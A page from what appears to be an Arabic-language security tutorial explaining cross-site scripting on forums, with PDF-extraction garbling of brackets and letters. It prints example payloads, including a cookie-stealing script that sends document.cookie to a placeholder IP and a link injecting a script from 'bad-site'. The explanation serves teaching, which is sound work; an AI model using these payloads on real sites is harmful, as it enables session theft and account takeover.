Page 276 - بسم الله الرحمن الرحيم

P. 276

‫اما بالنسبة للمنديات او مجموعات النقاش فانها تصرفض مثل هذه السكربتات وتصعتبرها خترق للخصوصية‬
‫او قد تصستغل في اغراض سيئة لسرقة معلومات حساسة من المستخدمين‬
‫المثال التالي يوضح كيفية ادراج السكربت ‪:‬‬
‫‪.Hello FOLKS board. This is a message‬‬
‫>‪<SCRIPT>malicious code</SCRIPT‬‬
‫‪.This is the end of my message‬‬

‫ان كلمة ‪ malicious code‬تصم ادرجهها او حقنها في بين علمتي السكربت وقد تصحتوي على كود ختبيث‬
‫يسرق او يرسل بيانات ‪ ...‬الخ لذلك فان مصمموا برامج المنتديات ومطوروا يمنعونها ال اذا مكنها الدمن‬
‫او المصمم او قد يتم استخدامها اذا مكن المنتدى تصفيل ‪ HTML‬مثل يتم ادراج السكربت مكان ختاصية المج‬

‫>‪script>document.write('<img‬‬
‫‪<src="http://my_ip_address/'+document.cookie+'">';</script‬‬
‫او قد يستطيع السكربت ان يكتب على شكل رابط في صفحة او يرسل لك بالبريد او يرسل لك عن طريق‬

‫المسنجر‬
‫والمثال التالي يوضح لك كيفية عمل رابط في صفحة‬
‫>?‪A HREF="http://example.com/comment.cgi‬‬
‫‪<mycomment=<SCRIPT>malicious code</SCRIPT>"> Click here</A‬‬
‫انظر هنا وركز في كيفية عمل الكود انها فقط عندما يصلك باحد الطرق المذكوره اعله وتصضغط عليه سينفذ‬

‫السكربت‬
‫وللشر ح اكثر لنفرض ان السكربت ‪ comment.cgi‬سكربت يرسل ملحظاتصك لصاحب الموقع او قد يكون‬

‫سكربت للبحث‬
‫في الموقع او المنتدى وهو يحتوي على متغير داختله اسمه ‪ mycomment‬ياختذ المدختلت او الملحظات‬

‫التي تصكتبها‬
‫فلو اعتبرناه انه سكربت بحث ويولد صفحات ديناميكية ناتصجه من البحث ستكون النتائج وختيمة فبدل ان‬
‫ينتج الصفحات الحيوية او النشطه سينتج مايطلبه السكربت منه لحظ الفكره هنا فقد ضمن السكربت داختل‬

‫حقل نصي فبدل من ان ياختذ الحقل النصي نصوص استخد‪.‬م ليأختذ اوامر من السكربت ‪.‬‬
‫وحتى اعقد المور اكثر لحظ المثال التالي ‪:‬‬

‫>‪A HREF="http://example.com/comment.cgi? mycomment=<SCRIPT‬‬
‫‪<SRC='http://bad-site/badfile'></SCRIPT>"> Click here</A‬‬

‫‪276‬‬

271 272 273 274 275 276 277 278 279 280 281